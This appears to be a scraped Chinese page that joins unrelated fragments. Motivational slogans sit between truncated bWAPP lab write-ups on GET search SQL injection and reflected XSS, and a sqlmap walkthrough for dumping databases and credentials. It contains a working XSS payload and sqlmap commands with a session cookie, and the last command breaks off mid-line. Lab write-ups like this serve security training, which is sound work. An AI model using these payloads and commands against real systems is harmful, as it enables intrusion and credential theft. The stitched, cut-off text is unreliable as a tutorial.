我生来就是高山而非溪流，我欲于群峰之巅俯视平庸的沟壑。我生来就是人杰而非草芥，我站在伟人之肩藐视卑微的懦夫！SQLInjection(GET/Search)题目标明为GET搜索型SQL注入，所以提交的SQL语句一般为关键字左右两边有“%”作为通配符的条件。low：搜索框内不输入任何数据，点击搜

别低头，皇冠会掉；别流泪，贱人会笑。0x01、XSS-Reflected(GET)Low输入的内容直接输出到页面中:后台服务端没有对输入的参数进行过滤,构造一个注入xsspayload即可:<script>alert(1)</script>成功弹窗Medium审查源码可以发现服务端进行了过滤,但只是addslashes()

使用sqlmap获取用户名和密码1.获取所有数据库sqlmap-u'http://bwapp.com/sqli_2.php?movie=1&action=go'--cookie="security_level=0;PHPSESSID=on0cemvtohplta6amq8oltqbh7"--dbs2.获取当前连接的数据库--current-db sqlmap-u'http://bwapp.com/sqli_2.